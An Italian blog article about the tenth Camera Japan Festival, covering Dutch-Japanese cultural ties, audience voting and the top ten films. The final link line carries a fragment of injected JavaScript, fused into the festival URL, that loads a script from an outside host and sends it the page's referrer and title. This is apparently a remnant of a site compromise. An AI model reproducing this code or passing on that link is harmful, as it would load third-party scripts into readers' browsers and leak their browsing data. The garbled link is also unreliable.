Camera Japan Festival 10 – Il Giappone visto dall’Olanda

L’Olanda ed il Giappone hanno sempre avuto un rapporto speciale. In tempi remoti furono proprio gli Olandesi tra i primi Europei a raggiungere le coste del Paese del Sol Levante. Persino durante il periodo di chiusura del Paese, durato oltre due secoli, i mercanti olandesi furono gli unici ad avere il permesso di portare avanti le loro attività commerciali, introducendo in Giappone tutte le nuove scoperte europee relative alle scienze e le arti, al punto da etichettare tutti gli Occidentali come “Olandesi”. L’introduzione di nuove competenze non fu univoco: buona parte della pittura dell’epoca di Hokusai fu introdotta e diffusa in tutta Europa, largamente influenzando tra gli artisti contemporanei più insospettabili: tra questi, Monet, Degas, Van Gogh.

Insomma, l’Olanda ha sempre ricoperto un ruolo da tramite e portavoce fra i due mondi. Per questo, quando vengono organizzati eventi che ne sanciscono l’incontro, è sempre un successo.

Non è quindi un caso che il Camera Japan Festival sia giunto quest’anno alla sua decima edizione. Un evento della durata di 2 settimane che parte da Rotterdam per concludersi ad Amsterdam e nel quale alla massiccia proiezione di pellicole si affiancano moltissimi altri eventi, incontri, mostre e workshop su arte, musica, danza, moda, architettura, cibo e molto altro. Non a caso, la prima definizione del festival che si trova sul sito è: “CAMERA JAPAN is a Japanese cultural festival”.

L’ulteriore particolarità di questo fesitval, oltre alla ricchezza ed all’ampiezza dei contenuti, è che la competizione cinematografica si svolge davanti agli occhi del pubblico. Tutte le visioni vengono accompagnate dalla distribuzione di un foglietto sul quale segnare il proprio voto, da riconsegnare all’uscita: il film vincitore diventa così tale grazie all’insindacabile giudizio degli spettatori.

Quest’anno il premio del pubblico  è stato consegnato a Kakekomi「駆け込み」(2015), pellicola diretta da Harada Masato che ha battuto per una manciata di voti l’altro grande favorito “0.5 mm” 「0.5ミリ」(2015) .

Per non fare torto a nessuno vi riportiamo qui sotto la top ten dei film più votati a questa decima edizione:

1. Kakekomi
2. 0.5 mm
3. Our Little Sister
4. Being Good
5. Assassination Classroom
6. The Case of Hana and Alice
7. Ryuzo and His Seven Henchmen
8. Our Family
9. A Courtesan with Flowered Skin
10. Round Trip Heart

Riportiamo inoltre qui di seguito un assaggio dell’atmosfera che si respira durante le due settimane ricche di eventi, incontri…e naturalmente buon cibo!

Per maggiori dettagli sul festival vi invitiamo a consultare il sito, sempre aggiornato e ricco di utili informazioni:
http://camerajapan.nl/s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share This: